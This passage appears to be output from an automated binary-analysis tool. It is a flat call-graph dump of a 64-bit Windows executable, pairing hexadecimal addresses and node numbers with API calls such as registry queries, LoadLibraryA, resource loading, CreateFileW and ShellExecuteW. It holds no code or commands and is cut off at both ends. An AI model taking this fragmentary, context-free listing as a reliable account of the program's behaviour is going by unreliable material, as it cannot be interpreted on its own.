7ff6b5b29640 4 API calls 94290->94291 94292 7ff6b5b3efac 94291->94292 94293 7ff6b5b29640 4 API calls 94292->94293 94294 7ff6b5b3f02e 94293->94294 94294->94255 94296 7ff6b5b3eede 94295->94296 94297 7ff6b5b29640 4 API calls 94296->94297 94298 7ff6b5b3eeea 94297->94298 94299 7ff6b5b29640 4 API calls 94298->94299 94300 7ff6b5b3eef6 94299->94300 94301 7ff6b5b29640 4 API calls 94300->94301 94302 7ff6b5b3ef02 94301->94302 94303 7ff6b5b29640 4 API calls 94302->94303 94304 7ff6b5b3ef0e 94303->94304 94305 7ff6b5b3ef68 RegisterWindowMessageW 94304->94305 94305->94257 94307 7ff6b5b36db9 94306->94307 94308 7ff6b5b36d80 94306->94308 94334 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94307->94334 94315 7ff6b5b2816b 94308->94315 94335 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94308->94335 94316 7ff6b5b439a8 94315->94316 94317 7ff6b5b8a502 94316->94317 94321 7ff6b5b439cc 94316->94321 94336 7ff6b5b2ee20 5 API calls Concurrency::wait 94317->94336 94319 7ff6b5b8a50e 94337 7ff6b5b2ee20 5 API calls Concurrency::wait 94319->94337 94321->94263 94322 7ff6b5b8a52d 94323->94268 94324->94284 94326 7ff6b5b2dda9 94325->94326 94328 7ff6b5b2ddc7 memcpy_s 94325->94328 94326->94328 94329 7ff6b5b2a7c0 94326->94329 94328->94281 94330 7ff6b5b2a7dd memcpy_s 94329->94330 94331 7ff6b5b2a7ed 94329->94331 94330->94328 94332 7ff6b5b6e7da 94331->94332 94333 7ff6b5b44c68 4 API calls 94331->94333 94333->94330 94336->94319 94337->94322 94339 7ff6b5b29640 4 API calls 94338->94339 94340 7ff6b5b41db2 GetVersionExW 94339->94340 94341 7ff6b5b27cf4 4 API calls 94340->94341 94343 7ff6b5b41dfc 94341->94343 94342 7ff6b5b2dda4 4 API calls 94342->94343 94343->94342 94344 7ff6b5b41e87 94343->94344 94345 7ff6b5b2dda4 4 API calls 94344->94345 94346 7ff6b5b41ea4 94345->94346 94347 7ff6b5b89645 94346->94347 94349 7ff6b5b41f3c GetCurrentProcess IsWow64Process 94346->94349 94348 7ff6b5b8964f 94347->94348 94361 7ff6b5b932f4 LoadLibraryA GetProcAddress 94348->94361 94350 7ff6b5b41f7e __scrt_fastfail 94349->94350 94350->94348 94352 7ff6b5b41f86 GetSystemInfo 94350->94352 94354 7ff6b5b210f1 94352->94354 94353 7ff6b5b896b1 94355 7ff6b5b896b5 94353->94355 94356 7ff6b5b896d7 GetSystemInfo 94353->94356 94360 7ff6b5b44ebc 34 API calls _onexit 94354->94360 94362 7ff6b5b932f4 LoadLibraryA GetProcAddress 94355->94362 94358 7ff6b5b896bf 94356->94358 94358->94354 94359 7ff6b5b896f0 FreeLibrary 94358->94359 94359->94354 94360->94222 94361->94353 94362->94358 94364 7ff6b5b27948 wcsftime 94363->94364 94365 7ff6b5b29640 4 API calls 94364->94365 94366 7ff6b5b27a02 94365->94366 94394 7ff6b5b25680 94366->94394 94368 7ff6b5b27a0c 94401 7ff6b5b43a38 94368->94401 94371 7ff6b5b271f8 4 API calls 94372 7ff6b5b27a2c 94371->94372 94407 7ff6b5b24680 94372->94407 94374 7ff6b5b27a3d 94375 7ff6b5b29640 4 API calls 94374->94375 94376 7ff6b5b27a47 94375->94376 94411 7ff6b5b2a854 94376->94411 94379 7ff6b5b6d05c RegQueryValueExW 94380 7ff6b5b6d131 RegCloseKey 94379->94380 94381 7ff6b5b6d08f 94379->94381 94384 7ff6b5b27a83 Concurrency::wait 94380->94384 94385 7ff6b5b6d147 wcscat Concurrency::wait 94380->94385 94382 7ff6b5b44c68 4 API calls 94381->94382 94383 7ff6b5b6d0b2 94382->94383 94386 7ff6b5b6d0bf RegQueryValueExW 94383->94386 94384->94225 94385->94384 94390 7ff6b5b29d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94385->94390 94391 7ff6b5b2ec00 4 API calls 94385->94391 94392 7ff6b5b24680 4 API calls 94385->94392 94387 7ff6b5b6d0f3 94386->94387 94389 7ff6b5b6d112 94386->94389 94388 7ff6b5b27cf4 4 API calls 94387->94388 94388->94389 94389->94380 94390->94385 94391->94385 94392->94385 94393->94227 94415 7ff6b5b68f90 94394->94415 94397 7ff6b5b2ec00 4 API calls 94398 7ff6b5b256b4 94397->94398 94417 7ff6b5b256d4 94398->94417 94400 7ff6b5b256c1 Concurrency::wait 94400->94368 94402 7ff6b5b68f90 wcsftime 94401->94402 94403 7ff6b5b43a44 GetFullPathNameW 94402->94403 94404 7ff6b5b43a74 94403->94404 94405 7ff6b5b27cf4 4 API calls 94404->94405 94406 7ff6b5b27a1b 94405->94406 94406->94371 94408 7ff6b5b246c8 memcpy_s 94407->94408 94409 7ff6b5b2469f 94407->94409 94408->94374 94410 7ff6b5b44c68 4 API calls 94409->94410 94410->94408 94412 7ff6b5b27a51 RegOpenKeyExW 94411->94412 94413 7ff6b5b2a87a 94411->94413 94412->94379 94412->94384 94414 7ff6b5b44c68 4 API calls 94413->94414 94414->94412 94416 7ff6b5b2568c GetModuleFileNameW 94415->94416 94416->94397 94418 7ff6b5b68f90 wcsftime 94417->94418 94419 7ff6b5b256e9 GetFullPathNameW 94418->94419 94420 7ff6b5b6c03a 94419->94420 94421 7ff6b5b25712 94419->94421 94423 7ff6b5b2a854 4 API calls 94420->94423 94422 7ff6b5b27cf4 4 API calls 94421->94422 94424 7ff6b5b2571c 94422->94424 94423->94424 94424->94424 94425 7ff6b5b2dda4 4 API calls 94424->94425 94426 7ff6b5b25785 94425->94426 94426->94400 94428 7ff6b5b29640 4 API calls 94427->94428 94429 7ff6b5b2778f 94428->94429 94435 7ff6b5b26f24 94429->94435 94432 7ff6b5b2782c 94433 7ff6b5b21051 94432->94433 94438 7ff6b5b27410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94432->94438 94434 7ff6b5b44ebc 34 API calls _onexit 94433->94434 94434->94232 94439 7ff6b5b26f60 94435->94439 94438->94432 94440 7ff6b5b26f52 94439->94440 94441 7ff6b5b26f85 94439->94441 94440->94432 94441->94440 94442 7ff6b5b26f93 RegOpenKeyExW 94441->94442 94442->94440 94443 7ff6b5b26faf RegQueryValueExW 94442->94443 94444 7ff6b5b26fdd 94443->94444 94445 7ff6b5b26ff5 RegCloseKey 94443->94445 94444->94445 94445->94440 94447 7ff6b5b45947 GetStartupInfoW 94446->94447 94447->94122 94506 7ff6b5b5b9bc EnterCriticalSection 94448->94506 94450 7ff6b5b492e4 94451 7ff6b5b5ba10 _isindst LeaveCriticalSection 94450->94451 94452 7ff6b5b2376e 94451->94452 94453 7ff6b5b49334 94452->94453 94454 7ff6b5b4933d 94453->94454 94458 7ff6b5b23778 94453->94458 94507 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94454->94507 94456 7ff6b5b49342 94508 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94456->94508 94459 7ff6b5b236e8 SystemParametersInfoW SystemParametersInfoW 94458->94459 94459->94156 94461 7ff6b5b237cd wcsftime 94460->94461 94462 7ff6b5b29640 4 API calls 94461->94462 94463 7ff6b5b237dd GetCurrentDirectoryW 94462->94463 94509 7ff6b5b257a0 94463->94509 94465 7ff6b5b23807 IsDebuggerPresent 94466 7ff6b5b6b872 MessageBoxA 94465->94466 94467 7ff6b5b23815 94465->94467 94468 7ff6b5b6b894 94466->94468 94467->94468 94469 7ff6b5b23839 94467->94469 94619 7ff6b5b2e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94468->94619 94583 7ff6b5b23f04 94469->94583 94473 7ff6b5b23860 GetFullPathNameW 94474 7ff6b5b27cf4 4 API calls 94473->94474 94475 7ff6b5b238a6 94474->94475 94599 7ff6b5b23f9c 94475->94599 94476 7ff6b5b238bf 94478 7ff6b5b6b8dc SetCurrentDirectoryW 94476->94478 94479 7ff6b5b238c7 94476->94479 94478->94479 94480 7ff6b5b238d0 94479->94480 94620 7ff6b5b8d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94479->94620 94615 7ff6b5b23b84 7 API calls 94480->94615 94483 7ff6b5b6b8f8 94483->94480 94486 7ff6b5b6b90c 94483->94486 94488 7ff6b5b25680 6 API calls 94486->94488 94487 7ff6b5b238da 94489 7ff6b5b238ef 94487->94489 94491 7ff6b5b26258 46 API calls 94487->94491 94490 7ff6b5b6b916 94488->94490 94494 7ff6b5b23913 94489->94494 94497 7ff6b5b25d88 Shell_NotifyIconW 94489->94497 94492 7ff6b5b2ec00 4 API calls 94490->94492 94491->94489 94493 7ff6b5b6b927 94492->94493 94495 7ff6b5b6b94d 94493->94495 94496 7ff6b5b6b930 94493->94496 94498 7ff6b5b2391f SetCurrentDirectoryW 94494->94498 94501 7ff6b5b271f8 4 API calls 94495->94501 94499 7ff6b5b271f8 4 API calls 94496->94499 94497->94494 94500 7ff6b5b23934 Concurrency::wait 94498->94500 94502 7ff6b5b6b93c 94499->94502 94500->94158 94503 7ff6b5b6b963 GetForegroundWindow ShellExecuteW 94501->94503 94621 7ff6b5b27c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94502->94621 94505 7ff6b5b6b99f Concurrency::wait 94503->94505 94505->94494 94507->94456 94508->94458 94510 7ff6b5b29640 4 API calls 94509->94510 94511 7ff6b5b257d7 94510->94511 94622 7ff6b5b29bbc 94511->94622 94513 7ff6b5b257fe 94514 7ff6b5b25680 6 API calls 94513->94514 94515 7ff6b5b25812 94514->94515 94516 7ff6b5b2ec00 4 API calls 94515->94516 94517 7ff6b5b25823 94516->94517 94636 7ff6b5b26460 94517->94636 94520 7ff6b5b2584e Concurrency::wait 94524 7ff6b5b2e0a8 4 API calls 94520->94524 94521 7ff6b5b6c05e 94709 7ff6b5ba2948 94521->94709 94523 7ff6b5b6c074 94525 7ff6b5b6c081 94523->94525 94526 7ff6b5b2652c 63 API calls 94523->94526 94528 7ff6b5b2586a 94524->94528 94727 7ff6b5b2652c 94525->94727 94526->94525 94529 7ff6b5b2ec00 4 API calls 94528->94529 94530 7ff6b5b25888 94529->94530 94535 7ff6b5b6c099 94530->94535 94662 7ff6b5b2eff8 94530->94662 94532 7ff6b5b258ad Concurrency::wait 94533 7ff6b5b2ec00 4 API calls 94532->94533 94534 7ff6b5b258d7 94533->94534 94534->94535 94536 7ff6b5b2eff8 46 API calls 94534->94536 94537 7ff6b5b25ab4 4 API calls 94535->94537 94539 7ff6b5b258fc Concurrency::wait 94536->94539 94538 7ff6b5b6c0e1 94537->94538 94540 7ff6b5b25ab4 4 API calls 94538->94540 94542 7ff6b5b29640 4 API calls 94539->94542 94541 7ff6b5b6c103 94540->94541 94545 7ff6b5b25680 6 API calls 94541->94545 94543 7ff6b5b2591f 94542->94543 94675 7ff6b5b25ab4 94543->94675 94547 7ff6b5b6c12b 94545->94547 94549 7ff6b5b25ab4 4 API calls 94547->94549 94551 7ff6b5b6c139 94549->94551 94550 7ff6b5b25941 94550->94535 94552 7ff6b5b25949 94550->94552 94553 7ff6b5b2e0a8 4 API calls 94551->94553 94554 7ff6b5b48e28 wcsftime 37 API calls 94552->94554 94556 7ff6b5b6c14a 94553->94556 94555 7ff6b5b25958 94554->94555 94555->94538 94557 7ff6b5b25960 94555->94557 94558 7ff6b5b25ab4 4 API calls 94556->94558 94560 7ff6b5b48e28 wcsftime 37 API calls 94557->94560 94559 7ff6b5b6c15b 94558->94559 94563 7ff6b5b2e0a8 4 API calls 94559->94563 94561 7ff6b5b2596f 94560->94561 94561->94541 94562 7ff6b5b25977 94561->94562 94564 7ff6b5b48e28 wcsftime 37 API calls 94562->94564 94565 7ff6b5b6c172 94563->94565 94566 7ff6b5b25986 94564->94566 94567 7ff6b5b25ab4 4 API calls 94565->94567 94568 7ff6b5b259c6 94566->94568 94570 7ff6b5b25ab4 4 API calls 94566->94570 94569 7ff6b5b6c183 94567->94569 94568->94559 94571 7ff6b5b259d3 94568->94571 94572 7ff6b5b259a8 94570->94572 94698 7ff6b5b2df90 94571->94698 94573 7ff6b5b2e0a8 4 API calls 94572->94573 94575 7ff6b5b259b5 94573->94575 94577 7ff6b5b25ab4 4 API calls 94575->94577 94577->94568 94579 7ff6b5b2d670 5 API calls 94580 7ff6b5b25a12 94579->94580 94580->94579 94581 7ff6b5b25ab4 4 API calls 94580->94581 94582 7ff6b5b25a60 Concurrency::wait 94580->94582 94581->94580 94582->94465 94584 7ff6b5b23f29 wcsftime 94583->94584 94585 7ff6b5b23f4b 94584->94585 94586 7ff6b5b6ba2c __scrt_fastfail 94584->94586 94587 7ff6b5b256d4 5 API calls 94585->94587 94588 7ff6b5b6ba4d GetOpenFileNameW 94586->94588 94589 7ff6b5b23f56 94587->94589 94590 7ff6b5b23858 94588->94590 94591 7ff6b5b6bab0 94588->94591 95071 7ff6b5b23eb4 94589->95071 94590->94473 94590->94476 94593 7ff6b5b27cf4 4 API calls 94591->94593 94595 7ff6b5b6babc 94593->94595 94597 7ff6b5b23f6c 95089 7ff6b5b26394 94597->95089 94600 7ff6b5b23fb6 wcsftime 94599->94600 95132 7ff6b5b29734 94600->95132 94602 7ff6b5b23fc4 94614 7ff6b5b24050 94602->94614 95142 7ff6b5b24d28 77 API calls 94602->95142 94604 7ff6b5b23fd3 94604->94614 95143 7ff6b5b24b0c 79 API calls Concurrency::wait 94604->95143 94606 7ff6b5b23fe0 94607 7ff6b5b23fe8 GetFullPathNameW 94606->94607 94606->94614 94608 7ff6b5b27cf4 4 API calls 94607->94608 94609 7ff6b5b24014 94608->94609 94610 7ff6b5b27cf4 4 API calls 94609->94610 94611 7ff6b5b24028 94610->94611 94612 7ff6b5b6bac2 wcscat 94611->94612 94613 7ff6b5b27cf4 4 API calls 94611->94613 94613->94614 94614->94476 95147 7ff6b5b23d90 7 API calls 94615->95147 94617 7ff6b5b238d5 94618 7ff6b5b23cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94617->94618 94619->94476 94620->94483 94621->94495 94623 7ff6b5b29be5 wcsftime 94622->94623 94624 7ff6b5b27cf4 4 API calls 94623->94624 94625 7ff6b5b29c1b 94623->94625 94624->94625 94634 7ff6b5b29c4a Concurrency::wait 94625->94634 94733 7ff6b5b29d84 94625->94733 94627 7ff6b5b2ec00 4 API calls 94628 7ff6b5b29d4a 94627->94628 94630 7ff6b5b24680 4 API calls 94628->94630 94629 7ff6b5b2ec00 4 API calls 94629->94634 94631 7ff6b5b29d57 Concurrency::wait 94630->94631 94631->94513 94632 7ff6b5b24680 4 API calls 94632->94634 94633 7ff6b5b29d21 94633->94627 94633->94631 94634->94629 94634->94632 94634->94633 94635 7ff6b5b29d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94634->94635 94635->94634 94736 7ff6b5b26d64 94636->94736 94639 7ff6b5b2649d 94640 7ff6b5b264ba FreeLibrary 94639->94640 94641 7ff6b5b264c0 94639->94641 94640->94641 94740 7ff6b5b548e0 94641->94740 94642 7ff6b5b26d64 2 API calls 94642->94639 94645 7ff6b5b264db LoadLibraryExW 94759 7ff6b5b26cc4 94645->94759 94646 7ff6b5b6c8f6 94648 7ff6b5b2652c 63 API calls 94646->94648 94649 7ff6b5b6c8fe 94648->94649 94651 7ff6b5b26cc4 3 API calls 94649->94651 94653 7ff6b5b6c907 94651->94653 94781 7ff6b5b267d8 94653->94781 94654 7ff6b5b26505 94654->94653 94655 7ff6b5b26512 94654->94655 94657 7ff6b5b2652c 63 API calls 94655->94657 94659 7ff6b5b25846 94657->94659 94659->94520 94659->94521 94661 7ff6b5b6c93f 94984 7ff6b5b31a30 94662->94984 94664 7ff6b5b2f029 94665 7ff6b5b7a7a8 94664->94665 94666 7ff6b5b2f040 94664->94666 95000 7ff6b5b2ee20 5 API calls Concurrency::wait 94665->95000 94669 7ff6b5b44c68 4 API calls 94666->94669 94668 7ff6b5b7a7bc 94670 7ff6b5b2f066 94669->94670 94672 7ff6b5b2f08f 94670->94672 94999 7ff6b5b2f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94670->94999 94995 7ff6b5b2f1bc 94672->94995 94674 7ff6b5b2f0c6 94674->94532 94676 7ff6b5b25ac6 94675->94676 94677 7ff6b5b25ae4 94675->94677 94679 7ff6b5b2e0a8 4 API calls 94676->94679 94678 7ff6b5b27cf4 4 API calls 94677->94678 94680 7ff6b5b2592d 94678->94680 94679->94680 94681 7ff6b5b48e28 94680->94681 94682 7ff6b5b48ea4 94681->94682 94683 7ff6b5b48e3f 94681->94683 95004 7ff6b5b48d98 35 API calls 2 library calls 94682->95004 94686 7ff6b5b48e63 94683->94686 95002 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94683->95002 94686->94550 94687 7ff6b5b48ed6 94689 7ff6b5b48ee2 94687->94689 94696 7ff6b5b48ef9 94687->94696 94688 7ff6b5b48e49 95003 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94688->95003 95005 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94689->95005 94692 7ff6b5b48e54 94692->94550 94693 7ff6b5b48ee7 95006 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94693->95006 94694 7ff6b5b52c80 37 API calls wcsftime 94694->94696 94696->94694 94697 7ff6b5b48ef2 94696->94697 94697->94550 94699 7ff6b5b2dfac 94698->94699 94700 7ff6b5b44c68 4 API calls 94699->94700 94701 7ff6b5b259f5 94699->94701 94700->94701 94702 7ff6b5b2d670 94701->94702 94703 7ff6b5b2d698 94702->94703 94708 7ff6b5b2d6a2 94703->94708 95007 7ff6b5b2880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94703->95007 94706 7ff6b5b79d43 94707 7ff6b5b2d7de 94707->94580 94708->94707 95008 7ff6b5b2ee20 5 API calls Concurrency::wait 94708->95008 94710 7ff6b5ba29c8 94709->94710 95009 7ff6b5ba2b70 94710->95009 94713 7ff6b5ba29de 94713->94523 94714 7ff6b5b267d8 45 API calls 94715 7ff6b5ba2a03 94714->94715 94716 7ff6b5b267d8 45 API calls 94715->94716 94717 7ff6b5ba2a23 94716->94717 94718 7ff6b5b267d8 45 API calls 94717->94718 94719 7ff6b5ba2a49 94718->94719 94720 7ff6b5b267d8 45 API calls 94719->94720 94721 7ff6b5ba2a6d 94720->94721 94722 7ff6b5b267d8 45 API calls 94721->94722 94723 7ff6b5ba2ac5 94722->94723 94724 7ff6b5ba240c 32 API calls 94723->94724 94725 7ff6b5ba2ada 94724->94725 94725->94713 95014 7ff6b5ba1d48 94725->95014 94728 7ff6b5b26542 94727->94728 94729 7ff6b5b2653d 94727->94729 94731 7ff6b5b26558 94728->94731 94732 7ff6b5b2656f FreeLibrary 94728->94732 94730 7ff6b5b54970 62 API calls 94729->94730 94730->94728 94731->94535 94732->94731 94734 7ff6b5b2a7c0 4 API calls 94733->94734 94735 7ff6b5b29d99 94734->94735 94735->94625 94737 7ff6b5b26490 94736->94737 94738 7ff6b5b26d74 LoadLibraryA 94736->94738 94737->94639 94737->94642 94738->94737 94739 7ff6b5b26d89 GetProcAddress 94738->94739 94739->94737 94741 7ff6b5b547fc 94740->94741 94742 7ff6b5b5482a 94741->94742 94745 7ff6b5b5485c 94741->94745 94801 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94742->94801 94744 7ff6b5b5482f 94802 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94744->94802 94747 7ff6b5b54862 94745->94747 94748 7ff6b5b5486f 94745->94748 94803 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94747->94803 94789 7ff6b5b5feb4 94748->94789 94749 7ff6b5b264cf 94749->94645 94749->94646 94753 7ff6b5b54883 94804 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94753->94804 94754 7ff6b5b54890 94796 7ff6b5b60304 94754->94796 94757 7ff6b5b548a3 94805 7ff6b5b4df60 LeaveCriticalSection 94757->94805 94943 7ff6b5b26d1c 94759->94943 94762 7ff6b5b26cf1 94764 7ff6b5b26d0f FreeLibrary 94762->94764 94765 7ff6b5b264f7 94762->94765 94763 7ff6b5b26d1c 2 API calls 94763->94762 94764->94765 94766 7ff6b5b26580 94765->94766 94767 7ff6b5b44c68 4 API calls 94766->94767 94768 7ff6b5b265b5 memcpy_s 94767->94768 94769 7ff6b5b6c9f5 94768->94769 94770 7ff6b5b26740 CreateStreamOnHGlobal 94768->94770 94779 7ff6b5b26602 94768->94779 94947 7ff6b5ba2e00 45 API calls 94769->94947 94772 7ff6b5b26759 FindResourceExW 94770->94772 94770->94779 94772->94779 94773 7ff6b5b6c97e LoadResource 94775 7ff6b5b6c997 SizeofResource 94773->94775 94773->94779 94774 7ff6b5b267d8 45 API calls 94774->94779 94777 7ff6b5b6c9ae LockResource 94775->94777 94775->94779 94776 7ff6b5b6c9fd 94778 7ff6b5b267d8 45 API calls 94776->94778 94777->94779 94780 7ff6b5b266e8 94778->94780 94779->94773 94779->94774 94779->94776 94779->94780 94780->94654 94782 7ff6b5b267f7 94781->94782 94785 7ff6b5b6ca6c 94781->94785 94948 7ff6b5b54c5c 94782->94948 94786 7ff6b5ba240c 94967 7ff6b5ba2200 94786->94967 94788 7ff6b5ba2430 94788->94661 94806 7ff6b5b5b9bc EnterCriticalSection 94789->94806 94791 7ff6b5b5fecb 94792 7ff6b5b5ff54 18 API calls 94791->94792 94793 7ff6b5b5fed6 94792->94793 94794 7ff6b5b5ba10 _isindst LeaveCriticalSection 94793->94794 94795 7ff6b5b54879 94794->94795 94795->94753 94795->94754 94807 7ff6b5b60040 94796->94807 94799 7ff6b5b6035e 94799->94757 94801->94744 94802->94749 94803->94749 94804->94749 94810 7ff6b5b6007d try_get_function 94807->94810 94809 7ff6b5b602de 94826 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94809->94826 94818 7ff6b5b60211 94810->94818 94822 7ff6b5b4db68 37 API calls 4 library calls 94810->94822 94812 7ff6b5b6021a 94812->94799 94819 7ff6b5b67738 94812->94819 94814 7ff6b5b60277 94814->94818 94823 7ff6b5b4db68 37 API calls 4 library calls 94814->94823 94816 7ff6b5b6029a 94816->94818 94824 7ff6b5b4db68 37 API calls 4 library calls 94816->94824 94818->94812 94825 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94818->94825 94827 7ff6b5b66d04 94819->94827 94822->94814 94823->94816 94824->94818 94825->94809 94826->94812 94828 7ff6b5b66d28 94827->94828 94829 7ff6b5b66d40 94827->94829 94881 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94828->94881 94829->94828 94832 7ff6b5b66d6d 94829->94832 94831 7ff6b5b66d2d 94882 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94831->94882 94838 7ff6b5b67348 94832->94838 94836 7ff6b5b66d39 94836->94799 94884 7ff6b5b67078 94838->94884 94841 7ff6b5b673bc 94916 7ff6b5b555b4 15 API calls _invalid_parameter_noinfo 94841->94916 94842 7ff6b5b673d3 94904 7ff6b5b5e418 94842->94904 94846 7ff6b5b673c1 94917 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94846->94917 94847 7ff6b5b673f7 CreateFileW 94851 7ff6b5b674eb GetFileType 94847->94851 94852 7ff6b5b67469 94847->94852 94848 7ff6b5b673df 94918 7ff6b5b555b4 15 API calls _invalid_parameter_noinfo 94848->94918 94855 7ff6b5b67549 94851->94855 94856 7ff6b5b674f8 GetLastError 94851->94856 94853 7ff6b5b674b8 GetLastError 94852->94853 94858 7ff6b5b67478 CreateFileW 94852->94858 94920 7ff6b5b55564 15 API calls 2 library calls 94853->94920 94854 7ff6b5b66d95 94854->94836 94883 7ff6b5b5e3f4 LeaveCriticalSection 94854->94883 94923 7ff6b5b5e334 16 API calls 2 library calls 94855->94923 94921 7ff6b5b55564 15 API calls 2 library calls 94856->94921 94857 7ff6b5b673e4 94919 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94857->94919 94858->94851 94858->94853 94862 7ff6b5b67507 CloseHandle 94862->94846 94864 7ff6b5b67539 94862->94864 94922 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94864->94922 94865 7ff6b5b67568 94867 7ff6b5b675b5 94865->94867 94924 7ff6b5b67284 67 API calls 2 library calls 94865->94924 94872 7ff6b5b675ec 94867->94872 94925 7ff6b5b66de4 67 API calls 4 library calls 94867->94925 94868 7ff6b5b6753e 94868->94846 94871 7ff6b5b675e8 94871->94872 94873 7ff6b5b675fe 94871->94873 94926 7ff6b5b604b8 94872->94926 94873->94854 94875 7ff6b5b67681 CloseHandle CreateFileW 94873->94875 94876 7ff6b5b676cb GetLastError 94875->94876 94877 7ff6b5b676f9 94875->94877 94941 7ff6b5b55564 15 API calls 2 library calls 94876->94941 94877->94854 94879 7ff6b5b676d8 94942 7ff6b5b5e548 16 API calls 2 library calls 94879->94942 94881->94831 94882->94836 94885 7ff6b5b670a4 94884->94885 94892 7ff6b5b670be 94884->94892 94886 7ff6b5b555d4 _get_daylight 15 API calls 94885->94886 94885->94892 94887 7ff6b5b670b3 94886->94887 94888 7ff6b5b5b164 _invalid_parameter_noinfo 31 API calls 94887->94888 94888->94892 94889 7ff6b5b6718c 94893 7ff6b5b52554 31 API calls 94889->94893 94902 7ff6b5b671ec 94889->94902 94890 7ff6b5b6713b 94890->94889 94891 7ff6b5b555d4 _get_daylight 15 API calls 94890->94891 94895 7ff6b5b67181 94891->94895 94892->94890 94896 7ff6b5b555d4 _get_daylight 15 API calls 94892->94896 94894 7ff6b5b671e8 94893->94894 94897 7ff6b5b6726b 94894->94897 94894->94902 94898 7ff6b5b5b164 _invalid_parameter_noinfo 31 API calls 94895->94898 94899 7ff6b5b67130 94896->94899 94900 7ff6b5b5b184 _invalid_parameter_noinfo 16 API calls 94897->94900 94898->94889 94901 7ff6b5b5b164 _invalid_parameter_noinfo 31 API calls 94899->94901 94903 7ff6b5b67280 94900->94903 94901->94890 94902->94841 94902->94842 94905 7ff6b5b5b9bc _isindst EnterCriticalSection 94904->94905 94906 7ff6b5b5e43b 94905->94906 94907 7ff6b5b5e464 94906->94907 94911 7ff6b5b5e4c2 EnterCriticalSection 94906->94911 94913 7ff6b5b5e487 94906->94913 94909 7ff6b5b5e170 16 API calls 94907->94909 94908 7ff6b5b5ba10 _isindst LeaveCriticalSection 94910 7ff6b5b5e52a 94908->94910 94912 7ff6b5b5e469 94909->94912 94910->94847 94910->94848 94911->94913 94914 7ff6b5b5e4d1 LeaveCriticalSection 94911->94914 94912->94913 94915 7ff6b5b5e310 fwprintf EnterCriticalSection 94912->94915 94913->94908 94914->94906 94915->94913 94916->94846 94917->94854 94918->94857 94919->94846 94920->94846 94921->94862 94922->94868 94923->94865 94924->94867 94925->94871 94927 7ff6b5b5e604 31 API calls 94926->94927 94929 7ff6b5b604cc 94927->94929 94928 7ff6b5b604d2 94930 7ff6b5b5e548 16 API calls 94928->94930 94929->94928 94931 7ff6b5b5e604 31 API calls 94929->94931 94940 7ff6b5b6050c 94929->94940 94933 7ff6b5b60534 94930->94933 94935 7ff6b5b604ff 94931->94935 94932 7ff6b5b5e604 31 API calls 94936 7ff6b5b60518 CloseHandle 94932->94936 94934 7ff6b5b60560 94933->94934 94937 7ff6b5b55564 fread_s 15 API calls 94933->94937 94934->94854 94938 7ff6b5b5e604 31 API calls 94935->94938 94936->94928 94939 7ff6b5b60525 GetLastError 94936->94939 94937->94934 94938->94940 94939->94928 94940->94928 94940->94932 94941->94879 94942->94877 94944 7ff6b5b26d2c LoadLibraryA 94943->94944 94945 7ff6b5b26ce3 94943->94945 94944->94945 94946 7ff6b5b26d41 GetProcAddress 94944->94946 94945->94762 94945->94763 94946->94945 94947->94776 94951 7ff6b5b54c7c 94948->94951 94952 7ff6b5b2680a 94951->94952 94953 7ff6b5b54ca6 94951->94953 94952->94786 94953->94952 94954 7ff6b5b54cd7 94953->94954 94955 7ff6b5b54cb5 __scrt_fastfail 94953->94955 94966 7ff6b5b4df54 EnterCriticalSection 94954->94966 94964 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94955->94964 94959 7ff6b5b54cca 94965 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94959->94965 94964->94959 94965->94952 94970 7ff6b5b547bc 94967->94970 94969 7ff6b5ba2210 94969->94788 94973 7ff6b5b54724 94970->94973 94974 7ff6b5b54746 94973->94974 94975 7ff6b5b54732 94973->94975 94977 7ff6b5b54742 94974->94977 94983 7ff6b5b5bef8 6 API calls __crtLCMapStringW 94974->94983 94981 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 94975->94981 94977->94969 94978 7ff6b5b54737 94982 7ff6b5b5b164 31 API calls _invalid_parameter_noinfo 94978->94982 94981->94978 94982->94977 94983->94977 94985 7ff6b5b31a48 94984->94985 94986 7ff6b5b31c5f 94984->94986 94991 7ff6b5b31a90 94985->94991 95001 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94985->95001 94986->94664 94991->94664 94996 7ff6b5b2f1ce 94995->94996 94998 7ff6b5b2f1d8 94995->94998 94997 7ff6b5b31a30 45 API calls 94996->94997 94997->94998 94998->94674 94999->94672 95000->94668 95002->94688 95003->94692 95004->94687 95005->94693 95006->94697 95007->94708 95008->94706 95012 7ff6b5ba2bae 95009->95012 95010 7ff6b5ba240c 32 API calls 95010->95012 95011 7ff6b5ba29da 95011->94713 95011->94714 95012->95010 95012->95011 95013 7ff6b5b267d8 45 API calls 95012->95013 